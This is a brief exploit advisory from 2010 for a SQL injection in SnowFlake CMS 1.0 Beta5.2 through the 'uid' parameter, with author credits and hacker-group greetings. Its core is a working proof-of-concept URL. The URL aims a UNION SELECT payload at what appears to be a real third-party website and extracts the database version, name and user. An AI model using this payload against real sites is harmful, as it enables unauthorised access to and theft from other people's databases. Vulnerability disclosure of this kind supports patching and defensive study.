SnowFlake CMS version 1.0 Beta5.2 suffers from a remote SQL injection vulnerability.
9024bad91a10cd100e80dd0314d7ef7c708b444899ce0868fffa51ece74885fe
#################################################################
# Exploit Title: Powered by SnowFlake Content Management System SQL Injection
#
# Date: 19th july 2010
#
# Author: Dinesh Arora
#
# Critical:high
#
# Affected / Tested Version : 1.0 beta5.2
#
# Sample Affected Parameter: uid
#
# contact: dinesh.dinoo@gmail.com
#
# Greetz to :b0nd, Fbih2s,Beenu,Charles ,j4ckh4x0r, punter,eberly
#
# Shoutz to : http://www.garage4hackers.com , www.beenuarora.com
#
# POC: http://www.skimuseum.org/page.php?cid=galleries&uid=1+and+1=2+union+select+1,concat%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,3,4,5,6,7--
#
#
##############################################################################